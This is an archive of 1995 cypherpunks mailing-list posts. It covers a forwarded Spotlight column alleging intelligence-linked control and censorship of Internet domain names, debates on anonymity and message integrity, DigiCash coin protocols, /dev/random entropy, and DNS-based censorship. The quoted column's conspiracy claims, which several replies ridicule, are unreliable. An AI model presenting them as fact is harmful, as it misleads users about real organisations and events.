Tgwy6RfNilNZ+ksff1ckFJ6wv9rywvH2Bq74Txvc0DfuDHReb8H1kbJkdQKXlcZF
sM5mJVL7870t/QbfBb3oMKcIVfOWhXCJXxlthmS42iHdyJxH6Hl2yd7aSE/7Uabg
b4NwgQHrC6voNfEBRtm2fk8cPn8L3IBJT2uDSBMb86n6+R86YcU+uEULyysVie6o
W01S7ImFISmZ6wSfxM4xXSS5pKAnv82ajXWxIpDFSqWLsAr4Es/yvw2YxrL01noG
BiLu4dAzyc8uNQ9WpMxSiMoK4t8G+j4dgeXuc+MR1fNY6Aopw8EFFFvAz8ENInYJ
FrdY9yoF91i7Hj7lFRobpWg+Lh+jX8aNS2QhTn9U3SJxvd96HeWRy+u6BE/cQJGE
Y2+P/lcxNSY9/3d+YNYzWIybZiGMXqv0taKzysz0eHxFB6wvuv4LMYcFjxwDCm4t
+hZaY6Vkar4r/fX3HnJdqmaxWz/p3DA0x8nn3B0gv7udVwuH+69q2YGcQ1oxR8eV
HFmzczNWTOf9juNSa1f0i/s8a1gCkhqnC/a+CM5RZsHQK0vRPxPRkFDu5I9IuWUR
ZsLR6Xu9b3J6b3sySMdZl0Gvqhb3ahK12LXMPAj/Wl+xAw7Mo1P7DSxHoozGqIbI
3EiycSRHGe4hx0rZIT3VwnhnB86SM1tiDaUjIHVhbQAnVOFIMA84OLBQvVmRFQ44
TdVXBotD3lRzXGZ2utY0cb5/ll/5osL4BjJSaYUQIYFqjBfcLsExDfJHrzL0VUhK
bZPjNc149Ux9Oxlscg7U57v3K08YzvN1vnZeWPnlmkdTWGDoWjvgtCx0VDQjVZlW
zQHqpLZilqf9eOsuY9LqcY9lG5EzCoN9lHzI2Od/lRzAEO5q9xGurbWHDauHs1Xi
W/5eNO3YOIM8I5FY5i/3AKsNizggBR/j4CLLlYK2SttgrNFsB3z0W/Akp0b3uWis
sHPuYZ7aeBDswI8HTGMx5wWYqIkOBhUiMtMZbViSy8YYAO9kblT4HfbcaOWVeh4/
WRgoLtD+7u4SAbqjGZphb2JB0bGhcZzGLZfodFE/GbBX1+AIp4FxWPM0+vUBdfVL
yXxNc3qfHvnS61aGWIUuOzkdt1WnO1z38itVxSEJFpoOJNWD/Rnxt1qQXCRN5vMx
BmJOpxK0Np1Qoqt7sMhm8ZLTwjUg75takFm+dnFJV/yej1Qhp3igJeLVqPc9zCjY
rRHSZjGgmL3t/B7yX7Z3/GNajwXiuBntP97RRg+rBNcaG8YCMKFVAp6ojuvrQWUQ
Mee08dfIS7/hKlDIVvkJXmr4nlpyzAJzZ7C3IdL+D26L/LNNbjQhalkE5DA0HzKI
xkJIMH4+B73/IPqoLp7syRRWvZZySUtyTz/aUrgV3i8P+Jj1+V5izy1pI8VOXcSM
F9eOe+fGgtXWKJuI+y5TSkvOBSaPCTA4Jd+TTvL5mkYhLlIuQpYjGznbfyM50dxY
AQEElCFPKxkr96kBEbRmdjeXBA==
=7IoD
-----END PGP MESSAGE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 05:19:44 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511020847.AAA10833@jobe.shell.portal.com>
Message-ID: <Pine.ULT.3.91.951102013958.18049A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 2 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> NOTE: More than 8 hours have passed since I sent this text in plaintext
> directly to Cypherpunks without its being posted, so in this attempt I am
> sending it encrypted through ALUMNI remailer. - Gary Jeffers
> gjeffers@socketis.net

Shit happens.

>                     INFO BLACKOUT

BWAHAHAHA!

>  From THE SPOTLIGHT newspaper's TECHNOLOGY & LIBERTY column by Clark
> Matthews - Nov. 06, 1995 issue.

The Spotlight's official classification in the UC and Stanford library
databases is "Serials -- Anti-Semitic." I don't mean to offend anyone too
much, but the Spotlight is generally regarded to be rather lunatic-fringe.
Though the same is probably said of anyone on the cypherpunks list, hmm... 

>    This ominous news came in the first of a series of articles by investi-
> gative journalist Steven Pizzo in WEB REVIEW, an online magazine of cyber-
> culture and politics (http://gnn.com/wr/) published by Songline Studios of

Spotlight tends to be rather vague in its sources for a reason. I found
the article to which this apparently refers at
http://gnn.com/gnn/wr/sept29/news/natl/index.html. It is rather less
lurid, but might still be of moderate concern. See the October 13
followup. 

I'm copying this to Steve Pizzo. I'm sure he'll get a real kick out of
being cited in The Spotlight, whose politics are a little different than 
his.

>    Through a complex chain of licensing arrangements and corporate acqui-
> sitions detailed in Pizzo's article, this crucial control over Internet
> domain names has passed from the non-profit National Science Foundation to
> Network Solutions, Inc. (NSI) of Herndon, Virginia. Last May, amid growing
> public disbelief of Establishment media reports about the Oklahoma City
> bombing provocation, NSI was purchased by Scientific Applications Interna-
> tional Corporation (SAIC) of San Diego.

This is semantically and logically equivalent to:

Last May, amid growing public disbelief of Establishment media reports 
about the Oklahoma City bombing provocation [provocation?], Fred Rogers 
changed his shoes.

Obviously, Mr. Rogers is part of the conspiracy.

>    SAIC is a $2 billion defense and FBI contractor with a board of direc-
> tors that reads like a Who's Who of the intelligence community. Board
> members include Admiral Bobby Ray Inman, the former director of the Na-
> tional Security Agency (NSA) and deputy director of the CIA; Melvin Laird,
> defense secretary under Richard Nixon; Donald Hicks, former head of re-
> search & development for the Pentagon; Donald Kerr, former head of the Los
> Alamos National Laboratory; and Gen. Maxwell Thurman (ret.), the commander
> of the U.S. invasion of Panama.

I know that at least part of this is true, at least in part.

SAIC also designed the hull of the Stars & Stripes yacht that won the 
America's Cup. Obviously Dennis Conner is part of a conspiracy that 
involves the Bavarian Illuminati, the Pope (who visited San Diego once), 
and New Zealand. Isn't it suspicious that the last America's Cup was 
contested and finally decided by the New York Supreme Court, the seat of 
the World Jewish Conspiracy?

Disclaimer: I was born in the San Diego area, and I know people who 
worked at SAIC, so I'm probably part of the conspiracy too.

>    The Internet is a marvel of computer software technology. It was de-
> signed to survive a nuclear attack on the United States-like the Post
> Office, it's literally smart enough to find a way to get the mail through,
> even if most of the network is missing.

I believe this is the first time I have seen the Post Office favorably 
cited.

>    But control of Internet domain name registration means the ability to
> remove troublesome-or outspoken-computer systems from the network. Po-
> tentially, this control also confers the power to insinuate "phantom"
> domains into the network-for surveillance purposes, for example-or for
> real-time, automatic censorship.

Anyone capable of sending this message should have known that this was 
complete BS.

>    Furthermore, anecdotal evidence gathered by this author suggests that
> actual "truth control" is taking place on the 'net now. E-mail messages
> with controversial contents-including the details of the SAIC takover of
> domain names-have consistently disappeared as they travel across the net-
> work.

And now we have PROOF! For THIS VERY MESSAGE, sent to THIS VERY LIST only
EIGHT HOURS AGO was MYSTERIOUSLY DISAPPEARED! Hide the women and children!

> News items concerning the Vincent Foster "suicide" investigation
> and allegations of NSA bank spying through compromised Inslaw software are
> being quickly and automatically canceled. And the cancellations are not by
> by their authors.

I know that several people who have been spamming the net with Foster 
garbage have been UDP'd. Read back issues of news.admin.net-abuse.misc.

> CRACKDOWN
> 
>    With domain names under the control of secret government insiders, it
> is even theoretically possible that large parts of the Internet could be
> SHUT DOWN AND SILENCED at critical times. This could be accomplished by
> suddenly altering domain name registrations or interposing compromised
> "domains" at crucial points.
> 
>    These compromised systems could serve as "black holes" at critical
> times, stopping e-mail and important news from reaching the world-or the
> rest of the country.
> 
>    Exercises in "turning the Internet off" have already taken place in
> Taiwan and Hong Kong. In Taiwan, the 'net was successfully shut down.
> All network traffic-including news, opinions and e-mail sent by computer
> users-was successfully "bottled up" on the island and prevented from
> reaching the world.
> 
>    In Hong Kong, the Internet wasn't quite strangled, but the British
> authorities who control that colony managed to throttle free electronic
> speech with the rest of the world until everything was bottlenecked into
> a few little-known satellite links.

Hmm, few specifics here. I wonder if they would care to elaborate. Nah.

It is, of course, true that countries including Singapore, China, 
Vietnam, and Cuba control net access rather tightly, and there have been 
reprisals against online dissidents.

>    These are alarming precedents and sure signs that powerful, shadowy
> forces are preparing to chop at the very roots of America's new Liberty
> Tree. The secretive people on the board of directors of SAIC are intell-
> igence professsionals skilled at manufacturing events-and then manufact-
> uring public opinion and consent by controlling the truth. Will Internet
> disinformation, censorship or "shutdowns" signal the next American crisis?

Only the Shadow knows.

- -rich
 llurch@networking.stanford.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJiap43DXUbM57SdAQHjBQP7BaaL0fgVCIpI5HDrTJ4TjtJgyjRWPWYU
vr2PuFBEGNZffzijaf9MTtwgjsYvy8/cMBuUiaBVIyVQloI1wfQMlHX1tVfnI6JM
hyT9zUJ4qovwsLCu+yX8JV1Ug2GtgyrW6AJJic+oFNohBJs8nQKxizwhVMa9AFrf
eAtmHLE+wsE=
=Qyen
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 2 Nov 1995 17:31:15 +0800
To: cypherpunks@toad.com
Subject: Was I censored by a sophisticated word parser/key word searcher?
Message-ID: <199511021323.HAA09729@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


My original plaintext post of Internet control by spooks has still not been 
posted. I have made 2 posts since that were posted quickly. Are things 
getting BAD!? Could I have fucked up? Do remailers now have a new use? 
Should remailers with encryption be used to spread the alarm to the rest of 
the Internet? My fellow Cypherpunks with bigger Internet mechanics brains 
should check this out. Can the original BLACKOUT post be reposted to other 
mailing lists or will it be censored? Check it out! - Beat State! - Gary Jeffers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 2 Nov 1995 18:12:51 +0800
To: cypherpunks@toad.com
Subject: Re: Was I censored <etc.>
Message-ID: <v02120d01acbe45596b38@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 3:15 AM 11/2/95, Gary Jeffers wrote:
>My original plaintext post of Internet control by spooks has still not been
>posted. I have made 2 posts since that were posted quickly. Are things
>getting BAD!? Could I have fucked up? Do remailers now have a new use?
 <etc.>

And at 4:45 am or so, having worked all bloody night--having received all
the posts you mention--I'm responding:

        (1) Chill out, chum.
        (2) CP maybe isn't the best place to post internal dialogues.
        (3) There's a good chance that many people on this list have had
            one or another experience with automagically/mysteriously
            delayed mail: AFAICT, we're all still here. If you'd like,
            I'll confirm that I heard my echo from the listserv.
and    (4)  If you live around the NY/NY area, give WFMU some money; and
            even if you don't, give them some money. If the spooks are
            ever stupid enough to "black out" the net, some fruit with
            very fine musical taste at FMU will let everyone know. But
            only with your support.

            Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 2 Nov 1995 19:41:54 +0800
To: cypherpunks@toad.com
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <199511020504.AAA19291@thor.cs.umass.edu>
Message-ID: <9511021110.AA01070@all.net>
MIME-Version: 1.0
Content-Type: text


> Dr. Frederick B. Cohen writes:
> > I have been convinced for some time that you can't have both integrity and
> > anonymity.  
> [and in a followup]
> > I might be misinterpreted as having meant that it is impossible to have
> > both integrity and anonymity. That is not what I meant, [...]
> 
> Er, thanks for the clarification....

A typical quotation taken out of context.  You missed the part after "I
meant" where I explained that I meant you couldn't assure ...  - That
is, you could have both or not have both, but you couldn't be certain
that you had both.

> > Integrity:= 1) Steadfast adherence to a strict moral and ethical code.
> > 	2) A state of being unimpaired; soundness.
> > 	3) The quality or condition of being whole or undivided; soundness
> > 	Also) soundness, completeness,
> > Alternatively:
> > 	1) Strict personal honesty and independence...
> > 	2) Completeness; unity...
> > 	3) The state of being unimpaired; soundness...''
> > 
> > In this context, I might be misinterpreted as having meant that it is
> > impossible to have both integrity and anonymity.  That is not what I
> > meant, although it is probably also true in a very strict sense.
> 
> All right, what makes you think that ?  Lest we wave our hands too much and
> totally misunderstand each other, let me lay down a more concrete scenario.
> If you have a substantially different scenario in mind, let me know.
> 
> Suppose that I send an anonymous message to a public forum such as this. I
> and the message seem to "have anonymity" by any standard I can presently
> imagine. Now, in what ways might I or the message lack integrity in this
> situation ?  

If the message was not of any particular import to anyone, integrity
would not be a very big issue, but suppose you took quotes out of
context and cleverly tried to construct a picture of the other person
as not being reputable.  People who read the message might believe that
what you said was true, or at least had a grain of truth to it.  That
sort of message lacks integrity, and the reason it lacks integrity is
because it has anonymity, not just because it's false and misleading.

To clarify even further, I seem to recall a posting some months ago from
an anonymous source declaring a new on-line for-sale forum called the
Internet Security Newsletter (or some such thing).  The anonymity of the
poster in the context of asking for money and the fact that one of the
people who was claimed to be on the board of editors was not, in fact, a
participant, led to the question of who the person was.  It turned out
that this person had a substantial history of putting forth falsehoods
as well as other related things that might have been very helpful in
evaluating the credence of his statements.  It turned out that the
newsletter was, at least in some sense and without making value
judgements, legitimate; but the anonymity of the person making the posts
made it harder to assure the integrity of the statements made, which
exacerbated the assurance issue. 

> I haven't broken my personal ethical codes, although perhaps
> I've violated someone else's. I have been honest, at least as much as I am
> generally honest in anything I write. I am not lying by donning the cloak of
> anonymity; I have not misrepresented my identity, merely refused to reveal
> it. The content of the message can be considered sound as much as anything
> else can. The message is incomplete in the sense that it does not include
> the true identity of the author -- is this what you would claim as a
> failure of integrity ?  All messages are incomplete in the sense that
> various important facts are absent from them.

I don't know you, which also means that I don't know your motives.  This
brings up the problem that, even though your postings may be true and
your motives honorable, they may not be, and there is no way to look
into your background and evaluate your history in order to assess your
statements.  In many cases, I believe statements because of their source
and my experience with that source.

I understand that over time, reputations can be built up for pseudonyms
(which are not necessarily anonyms) but then, with a pseudonym we might
reasonably ask what the motive is for hiding the real identity.  Is it
for fun? Because it's there? In solidarity for those who have legitimate
reasons for remaining anonymous? Or is it a means to influence others
for personal or national gain? Is it a way of spreading disinformation?
Is it a way to escape liability for slanderous statements? Is it a way
to keep people from finding out that there is a personal grudge being
played out? Without knowing the motive, how can we assess the
statements? In fact, how can we know that the original pseudonym still
applies? Someone could kill you and take over your pseudonym, and even
though we might hear of your death, the pseudonym might continue based
on your reputation but with another actual source.

It's an interesting concept that each statement should/could be taken on
its own and evaluated independently of the rest of a person's life
context, but in my experience, that has serious problems.

> > To clarify, I don't think you can assure integrity when you have anonymity.
> > 
> > This follows from my earlier writings (circa 1984-89), which are fairly
> > extensive, and in which I made the only marginally supported claim that
> > you can't have (i.e., assure) both integrity and secrecy in a system
> > with sharing.  This came originally from the result that integrity +
> > secrecy = no sharing (ala the combination of Biba and Bell-LaPadula)
> > which was extended into a POset which characterizes the extent to which
> > integrity and secrecy can be maintained based on transitive information
> > flow.
> > 
> > The less mathematical reasoning is that in order to be able to verify
> > integrity, you have to be able to examine the information that is
> > secret, while having secrecy requires that you not be able to have
> > independent verification.  Thus the two limit each other. 
> > 
> > Anonymity, in this copntext, can be thought of as secrecy.
> 
> I understand the nature of the information flow argument, but I don't see
> that it's applicable. You appear to contend that the assurance of the
> integrity of an anonymous message depends upon the examination of
> information that is "secret", that is, _not part of the message_. But no
> message is complete -- all messages have many such associated "secrets" not
> available as part of the messages. So the claim seems to be vacuous: we
> can assure the integrity of neither anonymous nor verinymous messages.

An important point.  The more we know, the more certain we can be.  With
computer-based anonymity as it is practiced today, and ignoring the
examples of the pseudonyms that were broken by legal warrant, we have
very little knowledge about the originator of a message, and thus we
have very little assurance of the integrity of their messages.  The
history built up over time for a given pseudonym certainly increases the
assurance associated with it, but there are other problems with this.

Example: I have two (N) pseudonyms that put forth different points of
view specifically directed to create different kinds of credence to
different audiences.  If the audiences knew that both (several) of the
pseudonyms were in fact the same person, they would have very different
beliefs about the individual given the combined picture than they might
get from any one of the pictures.

> Perhaps the rejoinder will be that anonymous messages have a 
> _characteristic_ piece of missing "secret" information, namely the senders'
> True Names. But you have yet to offer any argument that only certain special
> "secrets" must be examined in order to verify integrity.

It's not only the True Name that's at issue.  It's the association of a
set of messages and historical information with a source.  For example,
if we knew you were a KGB agent working in the disinformation and
economic espionage branches, we might evaluate your postings differently
than if we knew you were a high-school student from Deluth whose father
taught her a lot about cryptography when she was young.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 3 Nov 1995 00:34:44 +0800
To: cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <199511020239.SAA27491@ix.ix.netcom.com>
Message-ID: <199511021523.HAA19598@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


It's very frustrating to have to speculate so much due to the lack of
information.  Imagine how we would react if Cybercash or Netscape had
gone forward with what they claimed were secure protocols but had
refused to publish them, referring simply to old papers on RSA and
DES.  Yet Digicash gets away with this.

Bill Stewart <stewarts@ix.netcom.com> writes:

>At 01:20 PM 11/1/95 -0500, Michael Froomkin <froomkin@law.miami.edu> wrote:
>>I thought a property of Chaumian DigiCash was that a coin *had* to go back
>>to the bank before it could be spent again.  

>No.  The basic Chaum Digicash method looks like this:
>1) Alice creates a number of a recognizable form (Chaum's 1985 CACM paper
>uses n1n2n3...n64n1n2n3....n64, i.e. a 64-bit number concatenated with itself).
>2) Alice blinds the number and sends it to the bank (along with some request
>for withdrawing money from her account or payment in other coin or whatever.)
>3) The bank signs the number and sends it back.
>4) Alice unblinds the coin; now it's good, recognizably signed, and untraceable.

We presume it works basically like this, but there could be elaborations.
In particular, I have heard (from people who claim to know) that the
payee is normally embedded into the coin at spending time.

>>Logically, I can see at least four possibilities:
>>1) payee data is encoded onto the coin at time of payment, making it 
>>impossible for Carol to bank the coin.  I see no evidence of this in the 
>>docs at the Digicash site, but I just rechecked quickly and may have 
>>missed it.

>The basic protocol doesn't say anything about what a valid coin looks like;
>you could use the example in Chaum's paper or a long string followed by
>a checksum or whatever.  You _could_ put the payee's name account number
>in the string as the 64-bit "random" number, or even put both payer and payee.
>The bank could insist on that sort of thing if they wanted.
>If I remember right, the version in the Digicash trial left you the choice
>of filling in a specific payee or using "@" for bearer-payable coins.

Doing this would require the payee to be known at withdrawal time, which
is not apparently how it works.  I would speculate that actually what
happens is that the "basic coin" as above is encrypted, along with the
payee identity, all under the public key of the bank.  This was the
identity could not be stripped out by the payee or by a thief who snooped
the transmission.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@wmono.remailer (Anonymous)
Date: Thu, 2 Nov 1995 22:36:58 +0800
To: cypherpunks@toad.com
Subject: Re: [FRED] Anonymity and Integrity
Message-ID: <199511021410.IAA06974@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


[note: i'm not the original 'anonymous user' in this thread]

>If the message was not of any particular import to anyone, integrity
>would not be a very big issue, but suppose you took quotes out of
>context and cleverly tried to construct a picture of the other person
>as not being reputable.  People who read the message might believe that
>what you said was true, or at least had a grain of truth to it.  That
>sort of message lacks integrity, and the reason it lacks integrity is
>because it has anonymity, not just because it's false and misleading.

I, for one, pay very little attention to the author of any
given message on this list, and messages stand on their own
merit. I take everything I read (here and elsewhere) with
a grain of salt, and pay close attention to factual references
if they are supplied to I can do my own investigating and
draw my own conclusions, if the topic piques my interest.

An anonymous posting has exactly the same 'integrity quotient'
as any first-time poster; the reader has no historical perspective
on the author, and the message should be  accepted or discarded
on its own merits, not by a blind "he's usually clueful" or
"who the heck is this?" attitude.

[erm.. I'm not attacking anyone here, just spewing some thoughts
 I haven't bothered to express yet..]

(...)

>Example: I have two (N) pseudonyms that put forth different points of
>view specifically directed to create different kinds of credence to
>different audiences.  If the audiences knew that both (several) of the
>pseudonyms were in fact the same person, they would have very different
>beliefs about the individual given the combined picture than they might
>get from any one of the pictures.

[Obligatory _Ender's Game_ reference grudgingly suppressed]

This happens in 'real life' all the time. I hide the details
of my geeky job from my Friday-night friends, and don't bring
up my recreational pharmaceutical use with my business associates.
Either group would have different feelings about me if they
had a 'combined picture' of my lifestyle. 

>It's not only the True Name that's at issue.  It's the association of a

Personally, I find the quest for employment of any True Name scheme
hogwash, simply because of the multifaceted nature of human existence
(see above), where pseudonimity (virtual or social) is a part of 
everyday life.

True Names are logically almost impossible anyway. What base criteria
would a government, company, or other organization use to assign
and make use of a True Name? Driver's license? (fake) .. DNA fingerprint?
(cloning) .. any attempt to pin /me/ down to a single facet of 
existence is doomed to failure, given how adept the bad guys are
at keeping ahead of the good guys.

>set of messages and historical information with a source.  For example,
>if we knew you were a KGB agent working in the disinformation and
>economic espionage branches, we might evaluate your postings differently
>than if we knew you were a high-school student from Deluth whose father
>taught her a lot about cryptography when she was young.

We all have hidden agendas; personally, until I reach godlike status
(btw, anyone have any spare eye of newt laying around?) I'll have
to be content with judging most things I read with a healthy dose 
of cynicism, and squeeze what 'truth' I can out of it. I've been 
surprised too many times by hidden goals and 'double agents' to put
much stock in /anything/ sent down my pipe.

There's also an argument that the most prolific pseudonyms and 'real'
account-holders have Something They Want Us To Believe and should be
trusted no further than they can be thrown .. analogous, in my book,
to politicians .. perhaps the anonymous are the /only/ entities we
can trust...

--

Oinker - anonymous today in case any of you are my clients :P





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 2 Nov 1995 21:25:45 +0800
To: cypherpunks@toad.com
Subject: [NOISE] (Was: Re: US government department for crime...)
Message-ID: <199511021311.IAA59742@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

John Young wrote, in his unique style:

>Still, anonymous does make an astutely ironic observation, in 
>humorous lifting of the customary FinCEN cloak:
>
>That the hydra-headed agency may be literally aim at financial 
>*crimes* enforcement rather than enforcement of the laws 
>against such deeds.
>
>
>Especially given the participating renegade agencies who seem 
>to absolve themselves of these laws.
>
>
>Perhaps anonymous is right, they are a band of outlaws, daring 
>to overtly flaunt it, expecting no opposition from the gullible 
>cowed.
>

<I take the bait...> Actually, it's *two* bands of outlaws in
concert, and the "gullible cowed" are beginning to clamor for
anything else. This could be an interesting election year, if
the media would ever-in-hell get out of lap-dog mode and into
watch-dog mode. [I know...I'm not holding my breath.]
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMJjAB21lp8bpvW01AQHnrQP/XU5uwUfR0e9ZpJ2y8+d7MExdruGwrnyW
llp4rC6mNJl8IoyAkZG4ox79rK1mKqd4KzG/XP9lLzuqHCp9Cc5rR0ECe0I5RHnx
WFv66KkcsvVlGSflyMiuDi3R/Ul6y4wEOCaxus4OSHM+NhOcVKQddlg0F5AgOPbL
mzi7SF9/p0I=
=DVN9
-----END PGP SIGNATURE-----
Regards, Jim Ray

"Thank God we don't get all the government we pay for."  Will Rogers

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
Featuring cypherpunk privacy stuff and some of my babypictures!
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 3 Nov 1995 03:10:50 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <DHEtE6.FB6@sgi.sgi.com>
Message-ID: <199511021747.JAA08919@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DHEtE6.FB6@sgi.sgi.com>, Mark Murray <mark@grondar.za> writes:

>> ? "Gut feel" suggests to me that large ammounts of "predicted" input might
>> be worse than the normal sort of system noise you have been using.
>> 
>> But keep in mind that what we're doing is XOR'ing the input data into
>> the pool.  (Actually, it's a bit more complicated than that.  The input
>> is XOR'ed in with a CRC-like function, generated by taking an
>> irreducible polynomial in GF(2**128).  But for the purposes of this
>> argument, you can think of it as XOR.)  So since you don't know what the
>> input state of the pool is, you won't know what the output state of the
>> pool.

> I chatted with a colleague at work, and he helped bend my mind right.
> I had the mistaken notion that adding lots of data would "overflow"
> and "dilute" the entropy to an attackable state.

I think the problem is not merely flooding the device with non-random
input data.  If you coordinate sucking out entropy with feeding in
non-random data you can suck the real entropy in the system down to zero
while making the driver think it has plenty of randomness.  While it's
not clear to me how this would lead to an attack, it would be worrisome.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 3 Nov 1995 04:40:13 +0800
To: dreschs@mpd.tandem.com (Sten Drescher)
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <199511021810.KAA14547@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	Is it?  This is the _one_ thing in the article (is that term
> giving it too much legitimacy?) that I whought was barely true.  Whoever
> controls the root level DNS servers effectively controls the Internet.
> I postulated a couple of months ago about how the US Govt might attempt
> to censor the rest of the world: "Remove lurid.porno.site.other-country
> from your DNS system within 72 hours or we will remove references to
> your DNS servers from the root level servers.".  (I also speculated that
> if the US Govt tried doing this, that an 'underground' DNS system would
> form almost immediately.)
> 

	The US govt. doesn't run the root nameservers, nor are all the
root nameservers within US jurisdiction.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Fri, 3 Nov 1995 01:45:01 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511020847.AAA10833@jobe.shell.portal.com>
Message-ID: <199511021624.KAA05751@galil.austnsc.tandem.com.>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> said:

RG> On Thu, 2 Nov 1995 anonymous-remailer@shell.portal.com wrote:

>> But control of Internet domain name registration means the ability to
>> remove troublesome-or outspoken-computer systems from the
>> network. Po- tentially, this control also confers the power to
>> insinuate "phantom" domains into the network-for surveillance
>> purposes, for example-or for real-time, automatic censorship.

RG> Anyone capable of sending this message should have known that this
RG> was complete BS.

	Is it?  This is the _one_ thing in the article (is that term
giving it too much legitimacy?) that I whought was barely true.  Whoever
controls the root level DNS servers effectively controls the Internet.
I postulated a couple of months ago about how the US Govt might attempt
to censor the rest of the world: "Remove lurid.porno.site.other-country
from your DNS system within 72 hours or we will remove references to
your DNS servers from the root level servers.".  (I also speculated that
if the US Govt tried doing this, that an 'underground' DNS system would
form almost immediately.)

>> Furthermore, anecdotal evidence gathered by this author suggests that
>> actual "truth control" is taking place on the 'net now. E-mail
>> messages with controversial contents-including the details of the
>> SAIC takover of domain names-have consistently disappeared as they
>> travel across the net- work.

RG> And now we have PROOF! For THIS VERY MESSAGE, sent to THIS VERY LIST
RG> only EIGHT HOURS AGO was MYSTERIOUSLY DISAPPEARED! Hide the women
RG> and children!

	At least, it was allegedly lost.  If I were wanting to hype it,
I'd just _claim_ that it was lost.

		Sten
-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 08:49:35 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <Pine.ULT.3.91.951102101918.21219C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 2 Nov 1995, Sten Drescher wrote:

> Rich Graves <llurch@networking.stanford.edu> said:
> 
> RG> On Thu, 2 Nov 1995 anonymous-remailer@shell.portal.com wrote:
> 
> >> But control of Internet domain name registration means the ability to
> >> remove troublesome-or outspoken-computer systems from the
> >> network. Po- tentially, this control also confers the power to
> >> insinuate "phantom" domains into the network-for surveillance
> >> purposes, for example-or for real-time, automatic censorship.
> 
> RG> Anyone capable of sending this message should have known that this
> RG> was complete BS.
> 
> 	Is it?  This is the _one_ thing in the article (is that term
> giving it too much legitimacy?) that I whought was barely true.  Whoever
> controls the root level DNS servers effectively controls the Internet.
> I postulated a couple of months ago about how the US Govt might attempt
> to censor the rest of the world: "Remove lurid.porno.site.other-country
> from your DNS system within 72 hours or we will remove references to
> your DNS servers from the root level servers.".  (I also speculated that
> if the US Govt tried doing this, that an 'underground' DNS system would
> form almost immediately.)

I stand corrected. SurfWatch already allows people and organizations to do
this voluntarily for anything that mentions sex. I am sure that certain
sites are blocked by China, Vietnam, Singapore, and Fortune 1000
Corporations, for both "moral" and political reasons. 

But it's not the DNS you need to control -- it's the routers. Which are 
still rather distributed. BBN is part of the Eastern Elite, though...

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

